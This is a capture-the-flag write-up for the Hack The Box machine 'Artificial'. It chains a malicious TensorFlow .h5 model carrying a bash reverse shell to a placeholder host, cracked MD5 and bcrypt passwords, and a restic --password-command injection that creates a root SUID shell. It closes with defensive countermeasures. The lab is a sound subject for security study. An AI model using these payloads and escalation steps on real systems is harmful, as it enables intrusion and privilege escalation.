Summary
Artificial is an Easy Linux box demonstrating a classic ML-supply-chain
risk: TensorFlow .h5 model loading deserialises Python objects,
and tf.keras.layers.Lambda lets the loaded model carry arbitrary
Python that runs at load time, giving RCE as the app user. From
there, an MD5 hash cracked to its plaintext grants SSH as gael;
root falls out of Backrest (a restic GUI) on :9898, whose admin
password hash sits in a backup readable by gael's sysadm group.
The chain:
- Upload a malicious `.h5` model with a `Lambda` layer whose `call` function is `os.system(reverse-shell)`. Loading triggers RCE as `app`.
- SQLite `users.db` MD5 → `gael : mattp005numbertwo` via CrackStation; SSH.
- A backup readable by the `sysadm` group holds the Backrest config with a bcrypt admin password hash; `hashcat -m 3200` → `!@#$%^`.
- Backrest runs as root on :9898. Three escalation paths (any one works): create a backup of `/root` and download the SSH key; add a hook command that drops a SUID bash; abuse the "Run command" feature to inject `--password-command 'rev-shell'`.
Recon
22/tcp OpenSSH
80/tcp nginx → Flask AI model upload
9898/tcp Backrest (post-pivot)
requirements.txt (visible via /static/requirements.txt or
similar) lists tensorflow-cpu==2.13.1. The site accepts .h5
uploads.
Foothold — TensorFlow Lambda layer RCE
Build a malicious model:
import tensorflow as tf

def call(x):
    import os
    os.system("bash -c 'bash -i >& /dev/tcp/<C2>/<port> 0>&1'")
    return x

m = tf.keras.Sequential([tf.keras.layers.Lambda(call, input_shape=(1,))])
m.save('evil.h5')
Upload evil.h5; click “View Predictions”; tf.keras.models.load_model
invokes the Lambda callable; reverse shell as app.
User pivot — MD5 crack
$ sqlite3 ~/app/instance/users.db .dump
... INSERT INTO users(username,password) VALUES('gael','5b6e4f9a...');
CrackStation → mattp005numbertwo. SSH as gael.
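CrackStation is just a precomputed lookup; the same dictionary attack can be sketched offline with Python's stdlib `hashlib`. The target hash below is derived from the known password for illustration, since the real hash from `users.db` is elided above; the wordlist is a stand-in for rockyou.txt:

```python
import hashlib

def dictionary_attack(target_hex, wordlist):
    """Return the first candidate whose MD5 digest matches target_hex."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None

# Illustrative target: md5("mattp005numbertwo"); the writeup truncates
# the real hash, so we reconstruct one for the demo.
target = hashlib.md5(b"mattp005numbertwo").hexdigest()
wordlist = ["password", "letmein", "mattp005numbertwo"]
print(dictionary_attack(target, wordlist))  # mattp005numbertwo
```

Unsalted MD5 makes this embarrassingly fast: one hash per candidate, no per-user salt, so precomputed tables like CrackStation's work directly.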
Root — Backrest admin crack + RCE
$ ls -l /opt/backups
... -rw-r----- 1 root sysadm ... config_backup.tgz
$ tar -xzf config_backup.tgz config.json
$ jq .auth.passwordBcrypt config.json
"JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
$ echo '<base64>' | base64 -d
$2a$10$cVGIy9VMXQd0gM5ginCmjei2kZR/ACMMkSsspbRutYP58EBZz/0QO
$ hashcat -m 3200 hash.txt rockyou.txt
# -> !@#$%^
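The decode step can be reproduced with stdlib Python; the base64 value is the `auth.passwordBcrypt` string pulled from `config.json` above:

```python
import base64

# Backrest stores auth.passwordBcrypt base64-encoded; one decode
# recovers the raw bcrypt string that hashcat mode 3200 expects.
encoded = ("JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNt"
           "amVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP")
bcrypt_hash = base64.b64decode(encoded).decode()

print(bcrypt_hash)
# "$2a$" identifies bcrypt and "10" is the cost factor
assert bcrypt_hash.startswith("$2a$10$")
```

The `$2a$10$` prefix is what tells you to reach for hashcat's bcrypt mode (`-m 3200`) rather than treating it as an opaque blob.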
Log in to Backrest as admin. Easiest path: “Run command” on a restic repo with:
backup --password-command 'bash -c "cp /bin/bash /tmp/rb; chmod +s /tmp/rb"' /tmp
Run it, then `/tmp/rb -p` drops a root shell (`-p` stops bash from dropping the effective UID).
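The SUID primitive itself can be sanity-checked locally; run as an unprivileged user the copy is merely setuid to yourself, which is harmless, but when root (here, Backrest's restic invocation) runs it, the copy becomes a root-owned SUID shell:

```shell
# Copy a shell and set the setuid/setgid bits on the copy.
# Executed by root, /tmp/rb ends up root-owned with mode rwsr-sr-x,
# and `/tmp/rb -p` then keeps euid=0 instead of dropping privileges.
cp /bin/bash /tmp/rb
chmod +s /tmp/rb
ls -l /tmp/rb
```

This is the same drop-a-SUID-bash trick as the hook-command path; the "Run command" route just saves you editing the Backrest config.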
Why each step worked
- TensorFlow `.h5` deserialisation: `tf.keras.models.load_model` reconstructs Python callables (Lambda layers); load-time RCE is a documented risk across the Hugging Face / TensorFlow ecosystem.
- MD5 + dictionary password: weak hash + weak password.
- Bcrypt with low cost + dictionary password: `$2a$10$` is the default cost; against `!@#$%^` (present in rockyou-like wordlists) it cracks in seconds.
- restic `--password-command` again: same primitive as WhiteRabbit; here exposed via Backrest's "Run command" GUI.
Counterfactuals
- Don't load untrusted `.h5` models. Use TensorFlow's `safe_mode` (recent versions) or a sandboxed loader.
- Use a real KDF (bcrypt cost 12+, scrypt, argon2id) and enforce passphrase entropy.
- Don’t expose Backrest unauthenticated on a privileged port; reverse-proxy it behind SSO.
- Restrict restic's `--password-command` via an AppArmor profile that blocks shells.
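To make that last counterfactual concrete, an AppArmor profile could deny restic the ability to execute shells, which would break `--password-command 'bash -c …'` payloads while leaving normal backups alone. This is an untested sketch, not a production profile; paths and abstraction names vary by distro:

```
# /etc/apparmor.d/usr.bin.restic -- illustrative sketch only
#include <tunables/global>

/usr/bin/restic {
  #include <abstractions/base>

  # Deny spawning shells: kills --password-command shell payloads
  deny /bin/sh x,
  deny /bin/bash x,
  deny /bin/dash x,
  deny /usr/bin/bash x,

  /usr/bin/restic mr,
  owner /root/.cache/restic/** rwk,
}
```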
Source attribution
Reconstruction is grounded in:
- 0xdf, “HTB: Artificial” — https://0xdf.gitlab.io/2025/10/25/htb-artificial.html
- IppSec, “Artificial” video walkthrough — https://ippsec.rocks/?#Artificial
- Hugging Face / Trail of Bits writeups on TensorFlow deserialisation risks.
I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.